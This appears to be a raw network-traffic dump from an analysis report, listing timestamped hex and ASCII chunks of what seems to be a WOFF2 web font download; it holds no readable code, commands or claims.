                                                                          Data Ascii: wOF29|9"K?FFTM`N`@6$04 +.[2{:uWgy8qlY7R?A%YY@HV`mQ3D%XPC]OLD-c5OHD"ysneD "hIv%+)_>D*\Q
                                                                          2023-11-21 16:58:41 UTC485INData Raw: b0 9d 7c 41 05 b5 92 a5 e2 28 50 50 69 29 2a 8e b4 0b 4c 45 1a 77 62 9a da 84 ea ca 6f 7a 65 1b 5b da d8 37 6c ac 5b 79 6b 7b ab ba 61 79 bb 9b 79 ab ba 29 3c 8f ea fa af 18 61 8e 64 21 5f cb b2 10 c6 d8 04 0f 0c 30 29 fd ff e6 87 94 76 b7 4b ed f6 db 6e 53 a7 c4 c3 e7 ed 6d b3 d9 2e 4a 78 80 81 26 90 05 85 1c 42 14 e6 4d e3 df f1 f2 f0 f3 55 b4 65 ee 97 71 3e 40 5b 0f 04 6d 54 da 18 3c fc fd 12 f8 45 fe e8 be 5b 03 6d 60 03 c7 36 ad 35 e6 6c 17 31 e1 e3 5f 06 30 b8 d1 c2 c0 9c ac 16 fa 54 fc 62 d0 18 59 d7 76 21 77 c2 8f e6 a1 fd e1 e7 85 14 96 f3 42 93 0e 7c b0 06 7f c0 bf cd 21 a0 da a1 ef ee 4f d3 58 48 4b 40 b4 89 85 74 88 f4 1f b8 f6 ef 07 80 81 0c 6c 9c 76 d5 fd 2a 97 d0 af e6 ab 62 a4 eb f8 4a d1 34 73 e1 be c0 63 63 3e 17 18 3c fe f4 a7 25 b5 52
                                                                          Data Ascii: |A(PPi)*LEwboze[7l[yk{ayy)<ad!_0)vKnSm.Jx&BMUeq>@[mT<E[m`65l1_0TbYv!wB|!OXHK@tlv*bJ4scc><%R
                                                                          2023-11-21 16:58:41 UTC486INData Raw: 5a 56 49 6d 7d 53 6b fe 5f 27 b7 cb 02 dc 2e cb f6 f2 eb bd 30 fe 15 cf 37 e6 aa 99 16 ed fa 63 32 b0 6c 4f db 6d fb 79 3d 2e 04 23 18 5e 54 4c 2f 88 f3 6e 5e af f7 8f e2 44 dd 0a 87 ed f2 f8 85 34 3b ce 6b c0 93 f7 82 b4 5a 76 a7 fb 5f a9 59 7e 94 e4 65 d3 cf 1b 5e fd f5 3d 09 25 32 b2 2a 1b 5a bb 42 23 a2 13 92 d2 32 f3 8b cb 6b ea 1a 5a db bb 7a f4 ee 5f 4c 66 5e 49 55 4d 43 c7 ae 3d 7a 85 d2 33 b3 73 f3 0b cb aa eb 1a 5a 7b f1 e5 cf 48 70 6a 8c ce 16 29 6c 4e 08 02 47 a1 73 04 2a 8d c5 d3 17 8e c6 d3 99 7c b1 54 a9 33 3a b8 b8 7b 01 30 41 63 b0 44 3a 8b dd cb e8 43 af 8b 7b be 3e b9 1c 9e 9e 3f 7e f1 fd 6f 67 2f 5e 79 f2 ee d7 9f ff 9d ba 72 eb ef 2b 0f 0f f8 5f 3c 4d 34 da aa cf 24 f6 f1 55 4b bd 2b c9 f2 d6 ae 91 13 29 dc a8 63 d0 d4 fe e2 65 9b f7
                                                                          Data Ascii: ZVIm}Sk_'.07c2lOmy=.#^TL/n^D4;kZv_Y~e^=%2*ZB#2kZz_Lf^IUMC=z3sZ{Hpj)lNGs*|T3:{0AcD:C{>?~og/^yr+_<M4$UK+)ce
                                                                          2023-11-21 16:58:41 UTC488INData Raw: 35 23 5c 5b 58 24 2f 50 8a 97 f5 eb a1 6d b0 0d 07 6b be 6f d0 6f 89 1b e7 63 84 c0 eb 87 83 00 96 07 25 ce ae fd 7d e2 d4 ab 27 6d 55 fe 1e 8f 24 6b 75 3e 28 cd 1c ce 4f 3a 18 2e db b9 79 81 5a ab 1e 4c 8c 90 27 32 2f 13 b7 88 4b 3e 31 aa 96 51 52 d7 b4 58 94 43 18 80 b4 3f 83 2c eb 0e d5 7d 39 fd 41 9e c0 8d c7 ab dc 9c ad bd f1 be 8f 16 77 34 76 35 61 17 6c 5b 4b b1 ac eb f5 fa ca bb 32 cf a5 ca a4 04 d9 f0 c2 bb f6 85 90 dc c5 2d c4 06 86 90 a4 df 85 3b b8 21 44 b1 70 c1 cb 99 b0 13 b4 3a 3a c5 3d 23 cb b4 ce dc b6 20 46 6e e9 d4 43 50 2f 50 10 dc 76 bb 68 cd 19 78 af ef 3c c5 9a 03 32 75 44 01 cd 70 dd 5d 8b a8 83 0b 10 45 d3 3a 92 d1 88 10 e5 c3 29 75 d2 58 ce cf 9f 1b d9 8a 5c c6 5c b2 d7 ae 12 f8 f0 3d 8c 32 26 db 7a 5c 6b 2d d6 b6 67 b4 8c 9c 47
                                                                          Data Ascii: 5#\[X$/Pmkooc%}'mU$ku>(O:.yZL'2/K>1QRXC?,}9Aw4v5al[K2-;!Dp::=# FnCP/Pvhx<2uDp]E:)uX\\=2&z\k-gG
                                                                          2023-11-21 16:58:41 UTC489INData Raw: 1b 9c 3c 8b 3b d4 8a fa 5d 32 5e 3b 6f 71 57 c0 8d fa 96 6f 78 52 70 82 c4 34 d8 e9 00 92 54 71 69 e1 37 d5 6f 57 6f a4 e1 e7 8c 02 e6 4f c4 ed bc f8 a1 e6 cd 3f 18 73 eb b8 f3 7f 9e f2 a7 a2 74 85 73 7f 04 1f 45 92 57 85 81 53 f2 a2 de 34 c5 71 52 fc aa fd 2f 30 56 0a ad e7 b2 52 63 b5 df 4f e7 0b 9a fc 55 c6 b1 79 99 9b a2 5d 2e 16 dd 49 76 02 cd c6 84 ee 30 da c1 aa 83 da 9a 3d 2a f5 0e 29 7d 0b 8e 76 26 30 35 b3 ad 4e 2e 0d a4 e5 62 d9 6f 27 99 f6 d2 63 6d f2 4c d9 df d9 47 ca 9b 6c 5f ca e4 46 6b df ae 67 da 3e 5b 91 1e da 1a 69 7b 33 cf 27 0a ae e5 27 01 2b 57 bc c5 a7 a4 c5 af 93 31 d5 e8 73 35 5f ad b7 c0 da 0c 77 91 8b 1d 02 d8 f0 9b 7a f1 e2 f6 1b 46 63 65 16 4b 70 6a ae 56 4d ab a0 3b 34 fd 44 7c 70 e7 a4 70 f6 6e 7e cc 77 e6 db 19 85 07 e7 fd
                                                                          Data Ascii: <;]2^;oqWoxRp4Tqi7oWoO?stsEWS4qR/0VRcOUy].Iv0=*)}v&05N.bo'cmLGl_Fkg>[i{3''+W1s5_wzFceKpjVM;4D|ppn~w
                                                                          2023-11-21 16:58:41 UTC490INData Raw: 81 77 49 48 5f d6 e6 51 5c 46 08 d8 a1 15 d6 1f 23 d8 6a 9f 42 f2 26 d1 ec 0a 84 90 be 0e 8c 68 3b d4 12 c0 49 6f 17 9b 4c 26 da 71 f6 62 a9 0c 58 23 c8 2c 72 92 d8 03 84 07 a1 04 32 cc 45 1b 4b f4 70 a7 26 6d fe a4 1e d8 63 77 df 8a fd fa 1b e3 b9 0d 01 91 20 bb 90 76 43 9a f3 08 ff cb 86 6b b9 21 a0 06 fa 28 77 a1 cd a4 f1 e1 7c 84 1d 58 c2 ab 11 d8 db 6b f2 53 28 ae 39 71 bf 88 4e d9 90 f9 0c ef 47 89 77 82 5e 6d bc 43 18 ff b7 ab 69 12 f0 fb bd 08 a6 89 6f 08 56 4e b7 db a4 22 07 04 29 f3 51 a4 a2 3f c6 be c4 d4 4a 63 65 27 48 2d ab 94 10 d6 b6 01 b1 d7 39 6c 84 1a ec fb 47 68 08 06 b5 34 e5 ec 2b b1 19 43 49 b7 ab ec e7 84 77 c6 90 ab c6 21 0d a4 29 ba b5 88 ac 55 bf cd 0c 80 d8 e9 77 b7 7a c9 c7 5f 4e 88 a1 b5 f3 0d d9 fe b3 d0 09 e0 1a e2 12 76 04
                                                                          Data Ascii: wIH_Q\F#jB&h;IoL&qbX#,r2EKp&mcw vCk!(w|XkS(9qNGw^mCioVN")Q?Jce'H-9lGh4+CIw!)Uwz_Nv
                                                                          2023-11-21 16:58:41 UTC492INData Raw: 9c 74 f2 93 44 7e 54 87 6d 8a 4d c8 e3 7c 10 2a 39 fd f4 8a 9b 5c 56 8e f0 9d d5 73 31 19 db 17 ac 9e b0 1e e5 95 be ff ba 93 8e 48 09 02 d7 b0 0b 4a ee 30 99 b3 43 a2 ce 07 6b d6 aa 0a 04 1e 2b db 53 e6 5c a1 9f fd 2d d2 d7 e0 9b 25 11 df 5e ff b0 47 45 96 59 b2 bf 1a c9 6b 8c a9 2b 6f ac d8 cb eb 7b 6e 4e d7 b4 83 dd 19 02 99 40 08 22 33 18 2d 34 bb e3 d1 44 70 14 e1 bf 36 de 3a f9 a7 55 50 8b fe 48 18 69 75 21 e9 4c 32 69 d2 ab 64 9a 09 96 cd 00 06 ff 97 4d b3 aa 6e 97 e5 5e 67 99 39 a2 2d 4a 17 2b 2f 71 c1 07 34 b1 9f 1d fe 52 d0 0b b9 ae 23 a4 b0 21 15 3d 08 79 11 4f bd e5 b4 25 dd 31 86 6c 20 e3 d9 8e 65 4d 4c cb a1 f9 59 18 49 d4 3b 76 86 72 b6 a3 a3 50 f6 31 69 48 77 10 19 33 bc 57 e6 fc 4f ea 4b f0 55 57 7b cb 35 e9 5c 7a 36 4b c2 c0 7e ab aa dc
                                                                          Data Ascii: tD~TmM|*9\Vs1HJ0Ck+S\-%^GEYk+o{nN@"3-4Dp6:UPHiu!L2idMn^g9-J+/q4R#!=yO%1l eMLYI;vrP1iHw3WOKUW{5\z6K~
                                                                          2023-11-21 16:58:41 UTC493INData Raw: 0c 81 fa f5 4b b2 98 29 da 23 a6 d8 5c 89 14 d0 f1 85 e9 ce db 0f 9c 7a 48 b3 12 33 3c 6a 98 f5 ea 42 0e 31 f5 b9 fa 6d 58 40 1a 4e 24 fa ea 01 05 12 02 ca 94 7a 19 8d b0 43 d0 7f 6b ad 6a 16 d1 df 0c b6 56 b2 a5 7b 4b da 89 20 e3 9e d7 53 89 8a 4a b2 47 96 4e 19 1f c2 5a 39 56 64 cf b2 85 c2 a9 42 ee 64 29 e7 cf 60 7e a0 5e b0 58 f2 95 93 76 e1 df 7c 67 b5 34 54 a6 4f 15 4f 3d ee 69 f5 95 f5 dd 7b c5 ca d2 da ce d6 42 65 c4 1b f2 3d b8 7a 9f bc 7e 74 13 72 aa d7 ce 97 c0 43 32 fb 19 91 49 22 40 63 ae c7 3e 07 a4 de a1 45 6c 52 be 19 ec ac 35 18 f9 52 d5 9c af 51 2a 2b 5d 8b 3f 1c 54 54 94 76 70 7a 36 ff 67 af be f7 d6 19 42 ba 33 22 34 19 bc 95 3d 4c d0 f3 47 d9 4f 46 be 71 12 c0 02 fb 8f 07 f9 85 23 d4 64 d3 c2 85 43 e5 c2 ba f9 e1 23 7d 6c cc 9e 41 42
                                                                          Data Ascii: K)#\zH3<jB1mX@N$zCkjV{K SJGNZ9VdBd)`~^Xv|g4TOO=i{Be=z~trC2I"@c>ElR5RQ*+]?TTvpz6gB3"4=LGOFq#dC#}lAB
                                                                          2023-11-21 16:58:41 UTC494INData Raw: 8e f0 70 54 8e bc 4f 86 d5 48 28 83 99 18 ed 90 a0 e2 40 89 9d 49 5d d5 3c 15 df 37 41 d9 8f 1c 86 a1 a4 7a 45 3c 91 d1 2b c8 a3 da b3 ad a6 61 cc 9b 21 f8 02 61 65 bc 6a 0a 3c 56 fb 63 da ba e4 30 db ff 2c f4 90 0c 27 f5 cf 9e 3e f3 b4 cf b5 37 3c da 27 06 df 42 b0 e3 48 1e 22 d9 cd 9a 76 bf eb 23 b4 0a 56 26 70 77 bf 5b aa 3d 71 6e a4 23 ff 6a 66 4c 8a 64 21 2e 0c e6 e5 08 c0 05 40 a1 46 a3 9f f8 1d 93 bd 0d 72 f9 d5 21 1b 0c 30 5c ba f8 81 94 44 f4 d8 2b 29 c9 63 f3 bc 30 ee 86 57 7a 8e f1 f1 b8 50 ca 91 95 60 d8 bc 1a 0f a6 ac 2e 0d dc 82 23 39 59 19 0a f7 4a 07 80 47 91 0d 5a bc b7 03 72 bc a6 61 e0 43 08 dd 44 49 bf 14 02 45 a3 eb 76 e2 13 8b 81 25 bf 84 c2 f8 84 47 fa 89 bc 98 39 c0 70 a2 a1 39 31 97 e9 05 10 c0 de cd 27 bd b5 07 54 53 0c cf 1f f5
                                                                          Data Ascii: pTOH(@I]<7AzE<+a!aej<Vc0,'>7<'BH"v#V&pw[=qn#jfLd!.@Fr!0\D+)c0WzP`.#9YJGZraCDIEv%G9p91'TS
                                                                          2023-11-21 16:58:41 UTC496INData Raw: 1b 37 8f d2 f6 cf d9 8b ec 80 e4 2e 2f 2d 38 6a 77 f7 75 9d 0b ab da d6 7d b3 ec df 71 94 dc c2 37 59 f9 36 e3 c6 48 18 c7 1a 83 60 ed d8 d7 f4 5f 59 f9 e8 96 09 39 5a 3b 72 77 cc d0 31 47 b3 71 8e 30 ee 58 01 12 a0 53 2c ce e3 db 67 c7 7b f3 b3 0b d0 fc bd d0 f4 e7 35 43 ae 90 83 d1 f4 bc 00 2d 7c 6f ab 1c 6c b7 4d b9 17 42 52 5f c3 91 36 b7 d7 8e 34 a2 6b 95 b9 03 48 11 5d 79 26 fd 26 e7 72 a1 78 a2 53 c7 9c 27 db 35 43 37 7d dc c6 54 90 1e 8d 70 46 79 ba c5 6c 18 6e 62 2d a0 e9 98 35 a8 d6 05 97 1a 3b 26 91 7c 66 bf 66 e6 5e cd 13 99 16 46 47 43 e4 b9 71 39 69 9b 7b 9c 26 2a 57 66 0d bf d3 41 73 72 fd 29 f9 e2 83 8e 47 a9 d4 93 d1 b3 e0 82 82 da ac 48 d0 24 68 96 76 95 c3 65 ef 8d 27 ed db d4 63 0e 72 27 f6 72 e7 91 d8 44 35 e2 65 be b9 ba 23 08 2f b0
                                                                          Data Ascii: 7./-8jwu}q7Y6H`_Y9Z;rw1Gq0XS,g{5C-|olMBR_64kH]y&&rxS'5C7}TpFylnb-5;&|ff^FGCq9i{&*WfAsr)GH$hve'cr'rD5e#/
                                                                          2023-11-21 16:58:41 UTC497INData Raw: 8a c0 c9 f1 b8 77 92 db 53 2a 62 cf f1 0f 1b 9f 1e 1b b2 6d 62 d3 69 ab 81 10 ce 2a 9c 1f 2a 33 6a 8f 9e 82 de a0 b4 d5 35 58 9d 6c b7 eb 87 08 d7 5a 80 79 ad d8 ba e5 2a 1c 1d 49 92 a6 fc 1f f9 5f ea ed 02 e8 38 3d c8 d2 38 55 d9 10 90 23 85 af f4 c5 6c e5 27 80 e0 cf 57 1a 34 74 19 e7 5e 34 b0 9b 04 49 f5 e1 c2 15 20 bf 8b 21 82 15 be a6 d3 a0 60 19 ff 66 aa 56 71 43 6a cb ae bf a7 06 9d ea bd 79 8f 8c b2 a4 7f d4 61 e8 c3 97 05 5a 12 21 b3 91 cc 97 9e 70 34 a2 0f 8b d9 bf b6 af 9c 66 6b 7d ce a0 5d ca 01 d4 39 84 a3 fe 48 54 76 3a f5 65 c5 c1 0e 1b 29 ff ad 54 6b e5 d1 6a a9 a1 bf 06 5f d4 27 5f 54 8a 63 f5 0a af 96 26 6a 65 51 af 8c 57 8a 59 bb 4f d9 0f ba 97 66 85 9d 3e 4a 60 ab 1f 8d fd e8 63 7a 5e b9 04 1b 0c c9 a4 ef 62 2d 84 0a 7d 32 dd d7 d1 c3
                                                                          Data Ascii: wS*bmbi**3j5XlZy*I_8=8U#l'W4t^4I !`fVqCjyaZ!p4fk}]9HTv:e)Tkj_'_Tc&jeQWYOf>J`cz^b-}2
                                                                          2023-11-21 16:58:41 UTC498INData Raw: 4e 3c 69 bd dd 34 16 5e 3f e8 f2 b4 4e 5f 0b 27 9c 29 d7 73 55 bc bd 1e 49 b1 50 5e c7 dc 84 9e ed 56 87 25 ae 37 e6 23 cf d1 2e c3 b6 c7 68 7a fa a4 63 a5 90 f3 e6 1a b3 be 8b d8 81 f3 47 97 4b 7b 0c 99 76 f2 85 ce 9e 8e 96 2b 7e 3a 6d d7 b5 31 93 c6 d4 c5 cc 89 85 47 64 19 01 88 f4 3e 17 f7 6c 32 32 42 af 09 27 2b eb 18 1b 17 71 65 a9 7e da 32 d4 d6 f1 09 a4 63 20 66 b3 97 ac 79 2a ce 6f ed 9b 55 e6 70 15 d4 33 71 17 8a af c4 c7 f5 c3 d5 c3 f6 c9 a4 a4 3b e3 cd a0 f9 58 eb 2b a7 96 9f 3f f4 2b 27 23 fd 90 5a 97 8b 9f 9c 98 d4 d9 f2 c9 d4 b3 06 5d 14 dc fb fd c9 65 db b9 9f 6e 56 7d 64 3c 74 32 23 cd e9 a4 33 44 d8 75 11 e6 25 de 63 9a 17 d7 b6 cd 88 c0 ee 5c e3 0d 2f 80 86 e7 f6 16 58 f9 89 51 34 1d 96 30 d8 25 e3 76 eb 3e af 17 b6 85 19 71 b9 2a 57 cb
                                                                          Data Ascii: N<i4^?N_')sUIP^V%7#.hzcGK{v+~:m1Gd>l22B'+qe~2c fy*oUp3q;X+?+'#Z]enV}d<t2#3Du%c\/XQ40%v>q*W
                                                                          2023-11-21 16:58:41 UTC500INData Raw: 22 fa b7 6e a7 89 fa 5d 80 ce 61 b1 33 7e 19 c6 77 75 a7 a8 de 2e 22 99 3a 2b dd 8c 68 89 42 ae 2d cf 5a c5 71 dd 0a d6 84 6d 51 20 8b 6a 7c e5 ec e1 e3 dd 5d 9a 9e bd 51 cc c2 a4 a3 e4 63 2d e9 dc 67 c6 e6 67 40 c6 b3 d6 a6 4b 2d 5d 9c 7f ee 24 e0 e4 fd bd 1a 6d e1 6a 10 c6 66 11 0c 94 91 83 95 8f 22 92 c2 2e c4 e4 b4 48 a7 3f 8e 26 67 2e 95 99 c2 ba 61 47 cd f7 fe 5d 11 c2 ad 42 00 aa 21 ab 9a 1d 78 1d 76 69 b9 c7 5a 45 e3 4e 12 d0 2b 3b e2 f6 3f 58 c4 db 83 08 99 65 e5 c2 58 e4 73 16 ea 20 4e 05 14 6f b1 78 84 70 c5 99 92 c1 55 2a d0 b0 6b a4 e8 0a 5b 33 06 87 95 f2 12 b9 ec 2a c4 0f ff 04 b4 31 3f f8 5e cb c2 53 22 c4 93 6b 1b 24 8f 9b 98 77 0a 6e f4 f3 95 b6 8f be 5c ad 79 cd 5c 58 1b 79 ff fe 12 70 4b da 1e d9 96 2b 52 89 13 ac b0 bb fd 4e 8d f4 f4
                                                                          Data Ascii: "n]a3~wu.":+hB-ZqmQ j|]Qc-gg@K-]$mjf".H?&g.aG]B!xviZEN+;?XeXs NoxpU*k[3*1?^S"k$wn\y\XypK+RN
                                                                          2023-11-21 16:58:41 UTC501INData Raw: 56 6e 6b 5e 99 1e 58 ac ec ea bf a6 da f1 bb 6d d1 df 64 aa c1 87 5a 72 aa 31 2a bf e5 23 6d d9 5c 39 2d be 62 ed ca 88 fa 9e 37 58 3a 27 5a ab 66 7f fe 0c c9 c6 6c 9a ff 20 da bc 3d 21 be fa 89 da 23 53 f4 3b 36 2d 0d 0b 42 fe 4e 02 58 87 af 57 e8 ad 9c ca 6f d3 07 e0 6d af 37 65 09 0c a9 cb 05 12 88 a0 7e 51 4d 26 31 41 e3 d3 77 ce 77 bc b4 a7 ec b4 64 5a ca ba a7 35 c8 da b7 f5 06 5f f1 db c0 8f 08 c2 fb 88 d0 f3 08 82 63 06 a3 12 f5 5a 00 2d cd 09 b6 60 9c 92 b5 24 68 d9 59 64 2a 5a ec 8e a5 4a 38 7c 22 99 12 8f e9 09 92 e1 11 b2 80 a4 7c f4 39 e9 6b 11 61 1c ac 02 d2 29 ab 5a a9 c4 b7 29 21 bc 8b d6 de d5 be e5 b1 e9 2b f2 68 9f 89 ab 4a 50 2c 98 c6 ca 55 d7 ca 10 8e d7 f7 ae 82 b8 60 93 76 53 e7 8b a1 c3 a3 b1 32 a2 33 c5 f0 72 c9 ae 79 8c 3e 02 c1
                                                                          Data Ascii: Vnk^XmdZr1*#m\9-b7X:'Zfl =!#S;6-BNXWom7e~QM&1AwwdZ5_cZ-`$hYd*ZJ8|"|9ka)Z)!+hJP,U`vS23ry>
                                                                          2023-11-21 16:58:41 UTC502INData Raw: 8e 4d 6c bf 8e ec 7f 4a 23 14 a1 0a 58 32 c2 7d 51 2e 3a b8 93 6b f9 2b 30 13 82 9f a4 82 3c 35 85 af ab 92 e6 a6 ae 9a ba e6 02 1e 45 9f 95 a6 2c 07 62 a1 5d 26 c8 da 87 ce 9a 97 94 5f 98 c9 b6 56 bd 51 e0 bc 2e 6d 8e 29 76 36 81 ef 1f 35 10 46 72 55 2a b7 30 bb c0 4e 37 81 ef 19 23 cc f8 a2 b3 84 d0 a2 15 ef 29 a2 3b c8 0e 6b 55 41 a1 6b ca 80 fb f3 bd fe 71 38 1c ad ff 7b b8 9a 78 5c 3b 0b 73 89 ba 99 ab a7 bf 27 56 21 48 79 6e cf 6a 06 15 00 7a 01 a3 6a 9d b7 aa 4a 5d 89 35 86 09 b7 f7 3b 2c c2 85 cc 38 f8 1d 96 b4 19 00 ee b2 af d5 17 fa b9 d3 44 ca 07 4b 5c bb 9c 21 9e 96 9b 09 66 ec 55 c1 01 a6 b0 35 36 3b ab c8 a1 aa 30 19 84 70 d4 67 14 3d e2 a7 75 47 75 83 c5 a6 ea a2 8e aa 29 20 f9 c0 db af 24 2a 0a 34 95 a7 8d 41 aa 0c 6d 5d 50 ac 55 4e f6 01
                                                                          Data Ascii: MlJ#X2}Q.:k+0<5E,b]&_VQ.m)v65FrU*0N7#);kUAkq8{x\;s'V!HynjzjJ]5;,8DK\!fU56;0pg=uGu) $*4Am]PUN
                                                                          2023-11-21 16:58:41 UTC504INData Raw: 05 89 d1 bf 3a 94 41 d2 ce 5c 73 9e a0 aa 26 a3 89 9b 40 68 07 2f 09 84 8f 8b a8 d3 03 c8 3c 6b 6e cc da 23 a1 7f c9 3e 87 4c 16 21 61 bc 2b 68 44 5c 61 0e 9c ed 73 55 82 53 11 55 74 f3 7c cf 62 e9 36 15 eb 37 b3 0b 0c 56 dd b6 41 ab b4 9f 06 63 34 2c 8d f3 ed 99 85 7d cd 35 0b 4b 22 76 b3 2c 69 ba 4a 7a 29 b6 b2 e8 2a ab 25 65 e9 1b 2d 29 09 23 99 8c b4 fc f2 eb ff 84 0f 75 37 59 0e 67 4a 17 ec cd 12 16 08 f0 e7 70 f9 06 6c d2 1f e1 36 6f ea bd 76 cb 69 58 d6 e7 fc a6 6f d7 6c 24 a3 9c 75 ce 73 b6 11 9b 17 fd 9d 7f 9e 55 c1 d8 ff 51 5a c2 f1 a5 ad 14 6a 9f 17 02 a0 c8 5b 50 b0 c2 8f 27 f8 eb 03 56 73 8a c7 75 c8 93 eb 27 83 c4 4b bd 0c db 6b 71 2a 5a 39 ff a8 58 ae f0 17 2e c1 f2 b5 61 b1 26 6d 13 39 c6 f6 d3 4b ba 0f a2 dc 82 6a 3b 53 6b 03 08 ee 56 8a
                                                                          Data Ascii: :A\s&@h/<kn#>L!a+hD\asUSUt|b67VAc4,}5K"v,iJz)*%e-)#u7YgJpl6oviXol$usUQZj[P'Vsu'Kkq*Z9X.a&m9Kj;SkV
                                                                          2023-11-21 16:58:41 UTC505INData Raw: 41 f8 dc d1 71 67 6c 54 1a 55 4c 80 85 87 d5 1b 8f dd ee 26 99 7e 95 a2 cb e9 20 c5 73 82 d1 66 a1 22 92 88 c6 43 9a 9f 39 19 64 e9 73 49 3b 7d fc 17 08 81 e6 a3 b9 cf 1f 5e 4d e5 f8 33 c8 e9 a0 ab b1 ec 6a 29 e3 76 4d 8c f1 f4 7e 6a 91 d4 53 60 fa 49 75 75 ba fb e1 d9 41 0b 8d f3 60 77 c4 2a eb 61 45 68 36 85 32 4a 64 4a 96 1d 50 28 38 51 d3 b1 da 3c 65 58 72 e8 aa f2 b9 ea a2 a5 16 2c f2 19 11 e4 f6 0f c9 23 39 5b b6 93 36 74 64 11 0c 38 8e e5 19 f5 13 63 f3 fa e9 67 93 03 0d f6 92 aa 95 c2 66 52 b0 47 4e 7a 31 18 98 71 62 ed 7a 82 80 ef f4 66 e3 1b d7 27 7a 29 8e 2d d7 6d a4 a9 a1 83 18 d3 b2 e2 f0 04 ec 71 6c a6 9d 85 e0 55 a2 ed d9 26 e1 a4 6a 43 17 67 33 01 6e 67 90 22 6b 72 dd 5e 62 ad 09 68 88 fd d5 f1 95 23 db 27 cd 4f f3 27 67 f8 ea 29 f9 a2 3c
                                                                          Data Ascii: AqglTUL&~ sf"C9dsI;}^M3j)vM~jS`IuuA`w*aEh62JdJP(8Q<eXr,#9[6td8cgfRGNz1qbzf'z)-mqlU&jCg3ng"kr^bh#'O'g)<
                                                                          2023-11-21 16:58:41 UTC506INData Raw: a1 a8 c7 dc bf f9 46 ff 9f ad 44 d7 8f 90 4e 4f 16 b9 76 84 a5 47 d2 7c 53 fd 75 9f d6 5f d2 c3 a0 e4 5d ff fa 3a f9 cb 8c f8 8f 6c ca 97 22 92 7d 06 63 5f d7 ba 83 d0 f4 a5 0c 49 8f 56 0d e2 07 cb 3a f0 6e 3a 8e 61 7c 60 df 33 5e 3f d0 10 88 d3 39 13 22 b1 41 d3 f1 6d 99 92 85 2e b0 2a d4 77 02 b2 70 86 9f dd 24 9e 13 ec 2c b2 29 c4 11 a1 f7 9e 45 9c 81 da 22 35 95 59 69 77 ea f5 2e b1 62 27 b4 c8 ce d7 09 97 0a 37 69 76 a1 bc f9 8e 28 22 33 5f da 50 02 7d 47 28 d5 e7 74 b7 28 3d 93 6e c8 bb 33 2f b8 6d 47 f9 15 17 2b 78 2d 84 1f 2f 51 ea 0b 8d ce 94 8e bb 73 81 41 a7 8f 56 0d d3 67 b3 3d 63 65 0c 22 21 a1 03 75 c9 da e0 59 75 db 0f 3e bf 52 12 54 aa ed 9a ba 2e f9 19 94 da 3e c1 ab eb ca d2 b1 23 34 b4 2c f5 d1 8a ba 7d 6a a5 93 51 6f 3c 3a 10 58 aa af
                                                                          Data Ascii: FDNOvG|Su_]:l"}c_IV:n:a|`3^?9"Am.*wp$,)E"5Yiw.b'7iv("3_P}G(t(=n3/mG+x-/QsAVg=ce"!uYu>RT.>#4,}jQo<:X
                                                                          2023-11-21 16:58:41 UTC508INData Raw: e5 f9 e9 f2 c9 e5 7c f9 f4 ca 71 ad 6a 74 a0 c9 3d 2f c4 02 e2 03 c2 39 e2 9e 93 6f d4 78 5b 6b a6 de aa 36 94 d0 ce fd dd ec 3b 46 6b c1 bb 7a 5b e7 6e bf 81 d3 85 ac 61 4f 0c 3f 97 f7 91 10 7d 0c 53 15 0b 9a cb e6 7f a9 93 a5 5a b5 8c 9a 95 d1 f1 b8 97 be 0b 96 ab cf 99 41 e2 f1 6c 8a 8b da a2 56 c7 d0 b3 88 b4 dd f2 45 72 44 ba 37 00 3c 45 ec 07 d4 6f 14 d0 66 a5 f5 1e 01 86 89 6a 35 85 f8 e5 b8 54 99 85 f3 7b 3d 95 c4 ea 9b 70 e2 04 1b 15 58 4b 98 41 a9 4f 9b 55 94 88 b8 47 e4 4a a3 20 d7 f3 e2 c8 46 75 1d 18 27 f1 3c c3 e7 0a cb e2 66 25 16 bb ae 56 de cd ad aa b0 69 3a db 10 a8 cb d3 ba a3 18 a0 c2 2c 0f 4e a0 be e6 38 ad 2b a7 6c 31 52 db 8e ba 63 7b f4 c3 0a 7b b0 83 4b b6 4e e6 d3 fe 08 01 97 c2 69 94 ce 18 db b5 72 9c 14 10 68 be 85 16 8a 75 49
                                                                          Data Ascii: |qjt=/9ox[k6;Fkz[naO?}SZAlVErD7<Eofj5T{=pXKAOUGJ Fu'<f%Vi:,N8+l1Rc{{KNirhuI
                                                                          2023-11-21 16:58:41 UTC509INData Raw: 9f 48 5d da 9d 49 ef bd df 30 44 d0 c0 0a b6 b3 90 b5 21 73 76 65 9b 19 07 6b e8 ba 00 64 7f ed 2b 20 c9 a8 d8 12 60 7d ab 0f be 6e 6c fe c6 f0 8c d8 b9 30 3e 65 63 50 d0 4d ce 71 f6 fe d7 c0 22 c7 0e 78 83 6f 25 c4 2f ef 58 40 c8 17 53 4d 7d 8b 39 eb 29 fd 8f 62 93 a7 d8 2c cc 99 d1 d9 52 33 5b b2 56 21 2e 2c c7 6c 0b 2c 00 90 8d 36 df 14 d2 0c 6d 42 fa 94 6d 7b 05 4f 09 7b 8f c9 42 19 80 a2 07 04 ea ce 30 60 50 c8 f0 c0 7e df 43 83 51 7b 7f 24 68 87 b4 1d 50 23 79 24 00 0d 0b 28 8a 21 0d 10 a2 55 db 4b 03 c8 39 98 e4 95 4c 7c 49 9a db 7a a2 92 89 92 3a 6d 8e da e0 52 8e 74 06 e0 42 3a 63 8a 48 aa 03 f4 d1 80 31 d5 2c 70 44 9d 64 d7 f9 c4 e2 5a af 3a b4 ea 9f ff a2 a9 7c da 45 64 25 96 46 a8 85 f3 04 12 df 13 f0 52 c2 aa 76 ac 8b 5f a8 b1 25 66 9a a1 a2
                                                                          Data Ascii: H]I0D!svekd+ `}nl0>ecPMq"xo%/X@SM}9)b,R3[V!.,l,6mBm{O{B0`P~CQ{$hP#y$(!UK9L|Iz:mRtB:cH1,pDdZ:|Ed%FRv_%f
